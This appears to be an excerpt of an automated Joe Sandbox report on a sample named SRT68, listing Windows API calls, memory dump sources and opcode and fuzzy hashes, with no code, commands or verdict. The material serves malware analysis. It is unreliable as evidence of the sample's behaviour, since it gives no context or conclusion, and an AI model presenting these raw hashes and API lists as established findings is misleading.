                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: e8aa62b5655f1838bf9bb270be98b5c20a090aeac03ea569afd2d1aef1b807da
                                                                      • Instruction ID: 1527163b5c37cf381370a52c172083962b88559186bfd1214030abbb455fe2d1
                                                                      • Opcode Fuzzy Hash: e8aa62b5655f1838bf9bb270be98b5c20a090aeac03ea569afd2d1aef1b807da
                                                                      • Instruction Fuzzy Hash: 8F31C135600038AFEB65CF5CC858EAE7FF5EB09390F444099FA858B261CB359990DBA4
                                                                      APIs
                                                                        • Part of subcall function 00FF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FF8121
                                                                        • Part of subcall function 00FF810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FF812B
                                                                        • Part of subcall function 00FF810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF813A
                                                                        • Part of subcall function 00FF810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8141
                                                                        • Part of subcall function 00FF810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FF8157
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FF86A3
                                                                      • _memcmp.LIBCMT ref: 00FF86C6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FF86FC
                                                                      • HeapFree.KERNEL32(00000000), ref: 00FF8703
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: 767e2bd48431ce061db6095f431b4ef31059272e84a820cdd74c52883f4c45b5
                                                                      • Instruction ID: bc3408d7cc8cce69c82f8ba8f7eb3c00bdc3dc1649b0b5bee5f5efc22c08387c
                                                                      • Opcode Fuzzy Hash: 767e2bd48431ce061db6095f431b4ef31059272e84a820cdd74c52883f4c45b5
                                                                      • Instruction Fuzzy Hash: 96216972E0010DEBDB10DFA4CA49BFEB7B8EF45394F154059E544AB250EB35AE06EB90
                                                                      APIs
                                                                      • __setmode.LIBCMT ref: 00FC09AE
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                      • _fprintf.LIBCMT ref: 00FC09E5
                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00FF5DBB
                                                                        • Part of subcall function 00FC4AAA: _flsall.LIBCMT ref: 00FC4AC3
                                                                      • __setmode.LIBCMT ref: 00FC0A1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                      • String ID:
                                                                      • API String ID: 521402451-0
                                                                      • Opcode ID: 6719359f6138ba435c7e99f6cd745d0ff89dbf588b120b9ac9415733b89bd530
                                                                      • Instruction ID: 169806085914589823341841466f748e417b257795081fc396db12ed21d50a36
                                                                      • Opcode Fuzzy Hash: 6719359f6138ba435c7e99f6cd745d0ff89dbf588b120b9ac9415733b89bd530
                                                                      • Instruction Fuzzy Hash: 42112772908206AFDB04B6B49C47FFEB768AF46320F14005DF205561C2EE7D5C4677A5
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010117A3
                                                                        • Part of subcall function 0101182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0101184C
                                                                        • Part of subcall function 0101182D: InternetCloseHandle.WININET(00000000), ref: 010118E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1463438336-0
                                                                      • Opcode ID: 11c8a45c3219f50e2c4da7cc002fdf87a1cb62ca3a4c221035f356077795f919
                                                                      • Instruction ID: b2b22fbeb5c3166912632b1d052602e2bb07c7c17812065b83d4bccc10631744
                                                                      • Opcode Fuzzy Hash: 11c8a45c3219f50e2c4da7cc002fdf87a1cb62ca3a4c221035f356077795f919
                                                                      • Instruction Fuzzy Hash: 70219231200606BFEB269F74DC00FBABBF9FF48710F10401AFB9196654DB79941197A0
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,0102FAC0), ref: 01003A64
                                                                      • GetLastError.KERNEL32 ref: 01003A73
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 01003A82
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0102FAC0), ref: 01003ADF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: 6b74f7110fc17020b38423d83ebba1d4fde87ccba3d1043f35e7eb3688e1831a
                                                                      • Instruction ID: 26eae621515b8783b53977de38b428d11eca7d22e65b7aa99763aa7cb00bfd57
                                                                      • Opcode Fuzzy Hash: 6b74f7110fc17020b38423d83ebba1d4fde87ccba3d1043f35e7eb3688e1831a
                                                                      • Instruction Fuzzy Hash: 2F2171745082029F9712EF28C88186B7BE4BE5B764F104A5EF4D9CB2D1DB31D949CB92
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 01025D80
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01025D9A
                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01025DA8
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01025DB6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$AttributesLayered
                                                                      • String ID:
                                                                      • API String ID: 2169480361-0
                                                                      • Opcode ID: 2b847fb8da10c75cc1031ca5c3ae4fdead74065719449a0d9da7797b4666b92e
                                                                      • Instruction ID: 50c987423a52976d7fda6dab83dd88afc5b29b65b8702b3ca92c5074ff85daa0
                                                                      • Opcode Fuzzy Hash: 2b847fb8da10c75cc1031ca5c3ae4fdead74065719449a0d9da7797b4666b92e
                                                                      • Instruction Fuzzy Hash: D811D631205121AFDB24AF14DC08FBF77A9EF86360F144218F956D72E2C7A8AD01C754
                                                                      APIs
                                                                        • Part of subcall function 00FFF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?), ref: 00FFF0CB
                                                                        • Part of subcall function 00FFF0BC: lstrcpyW.KERNEL32(00000000,?,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFF0F1
                                                                        • Part of subcall function 00FFF0BC: lstrcmpiW.KERNEL32(00000000,?,00FFDCD3,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?), ref: 00FFF122
                                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDCEC
                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDD12
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FFEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FFDD46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: a4421dc029e54915ab207ebe1fa34e53c1d37fcfa441a4ad70e43d94c9065fa2
                                                                      • Instruction ID: 19aa0581980c7020100804d8809b487f170e22db0ad8a8b845f7943b10c152e3
                                                                      • Opcode Fuzzy Hash: a4421dc029e54915ab207ebe1fa34e53c1d37fcfa441a4ad70e43d94c9065fa2
                                                                      • Instruction Fuzzy Hash: 9C11B13A200309EBCB259F34C845D7E77A9FF45350B50802AFA06CB260EB759841E790
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00FD5101
                                                                        • Part of subcall function 00FC571C: __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                        • Part of subcall function 00FC571C: __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                        • Part of subcall function 00FC571C: RtlAllocateHeap.NTDLL(01570000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: 476683930c519bff05b60b3ad96e150aa029fed8ac33395a68b6c873c27281cc
                                                                      • Instruction ID: 75d3cf9ee324b2ca358a8578228d250ac6f0e5ed84eb53fbec72c091d78692e2
                                                                      • Opcode Fuzzy Hash: 476683930c519bff05b60b3ad96e150aa029fed8ac33395a68b6c873c27281cc
                                                                      • Instruction Fuzzy Hash: BA11E772904A13AECB312F74AD06B5D37A9AF50BF1B24452FF9489A350DE398C41B790
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00FA44CF
                                                                        • Part of subcall function 00FA407C: _memset.LIBCMT ref: 00FA40FC
                                                                        • Part of subcall function 00FA407C: _wcscpy.LIBCMT ref: 00FA4150
                                                                        • Part of subcall function 00FA407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA4160
                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00FA4524
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA4533
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FDD4B9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1378193009-0
                                                                      • Opcode ID: 2ba4dca891086ec79bcbf9e5779ec44627da12e0745e89aeba41fb8c3a3ffab5
                                                                      • Instruction ID: 091fb3bc2e1d8989a2c0b81ad2480b8eaf486d5a7907ea03025df4f5431b2048
                                                                      • Opcode Fuzzy Hash: 2ba4dca891086ec79bcbf9e5779ec44627da12e0745e89aeba41fb8c3a3ffab5
                                                                      • Instruction Fuzzy Hash: B021F8B5D043849FE732CB248855BE6BBECAB02318F18008EE6CE56241C7B53984E741
                                                                      APIs
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01007896,?,?,00000000), ref: 00FA5A2C
                                                                        • Part of subcall function 00FA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01007896,?,?,00000000,?,?), ref: 00FA5A50
                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 01016399
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010163A4
                                                                      • _memmove.LIBCMT ref: 010163D1
                                                                      • inet_ntoa.WSOCK32(?), ref: 010163DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 1504782959-0
                                                                      • Opcode ID: 42c18067e9ce103dac91991ed1e74b0c269f72dddc329a728e61dae585d807b3
                                                                      • Instruction ID: b24b876de6b98964038d81bab4eaf4141f39a23612c10cf298408ae646200184
                                                                      • Opcode Fuzzy Hash: 42c18067e9ce103dac91991ed1e74b0c269f72dddc329a728e61dae585d807b3
                                                                      • Instruction Fuzzy Hash: EA115E7550010AAFCB00FFA4DD46DEFB7B8AF09310B144069F505A7161DF79AE04EB61
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FF8B61
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8B73
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8B89
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FF8BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 8a3ea32cabcd3242f4ce41281c6056181bcb364ccf26dd66d48feaa85481fb4c
                                                                      • Instruction ID: 6d45098d878b07ce6bd70dfac0382362ce64a3cbe925a99571578835d9abc16c
                                                                      • Opcode Fuzzy Hash: 8a3ea32cabcd3242f4ce41281c6056181bcb364ccf26dd66d48feaa85481fb4c
                                                                      • Instruction Fuzzy Hash: 87110A79901218BFDB11DFA5C885FADBB74FF48750F204095EA00B7260DA716E11EB94
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00FA12D8
                                                                      • GetClientRect.USER32(?,?), ref: 00FDB5FB
                                                                      • GetCursorPos.USER32(?), ref: 00FDB605
                                                                      • ScreenToClient.USER32(?,?), ref: 00FDB610
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 4127811313-0
                                                                      • Opcode ID: 10e3cbb6d98d87e72a916d56163fda3f55e99f3352b784c234a3cee04e3f19f7
                                                                      • Instruction ID: 106a220edd62adfea0cec918c504a2225776d3291cd241ba71644581aa704c0e
                                                                      • Opcode Fuzzy Hash: 10e3cbb6d98d87e72a916d56163fda3f55e99f3352b784c234a3cee04e3f19f7
                                                                      • Instruction Fuzzy Hash: 39110D75A0001AEFCB20DFA8D989AEE77F8FB0A341F510455F941E7240C735FA519BA5
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 0100115F
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 01001184
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 0100118E
                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00FFFCED,?,01000D40,?,00008000), ref: 010011C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: 872be46037749ab4ebdd9e52f7f9e8299223b64ba47b578220d95ec7589f6f86
                                                                      • Instruction ID: ff3d50d47fbd63c11ac00ed91cd9f1bb9024568466fe35e16ec7e77389e50e1f
                                                                      • Opcode Fuzzy Hash: 872be46037749ab4ebdd9e52f7f9e8299223b64ba47b578220d95ec7589f6f86
                                                                      • Instruction Fuzzy Hash: 97115A31C0061DE7DF159FA4D848AEEBBB8FF09751F504045EA80B2281CB359550CBD1
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FFD84D
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FFD864
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FFD879
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FFD897
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: d8679b6aad678bdb443a79253390f8a36f824a7d4b28ab3c4f767bcaf76bbc68
                                                                      • Instruction ID: 164ef2811ac4b4602b285760be0b24c0c5ca0cd64d35d4d1d661268855c29d4d
                                                                      • Opcode Fuzzy Hash: d8679b6aad678bdb443a79253390f8a36f824a7d4b28ab3c4f767bcaf76bbc68
                                                                      • Instruction Fuzzy Hash: 17115E75606309EBE3309F50D808FA6BBBDEF00B80F208569E656D6090D7B5E549EBA1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction ID: efab7856542bdcbc5f6ee6ad28e5b98e25f0904309f4939d9a23e7c2cf55c7e2
                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction Fuzzy Hash: 03014B7244824ABBCF166F84DC05CEE3F63BB18360B588456FA1858271E336D9B1BB81
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 0102B2E4
                                                                      • ScreenToClient.USER32(?,?), ref: 0102B2FC
                                                                      • ScreenToClient.USER32(?,?), ref: 0102B320
                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0102B33B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      • Opcode ID: c9c9bb13fcc33aa7b53f086be9616812d0af62e14802bfde2a44030cebfa26d8
                                                                      • Instruction ID: 40509005baa930f25b530997f7174a1419aa7a92fa66670fdb8510498bf5f0c6
                                                                      • Opcode Fuzzy Hash: c9c9bb13fcc33aa7b53f086be9616812d0af62e14802bfde2a44030cebfa26d8
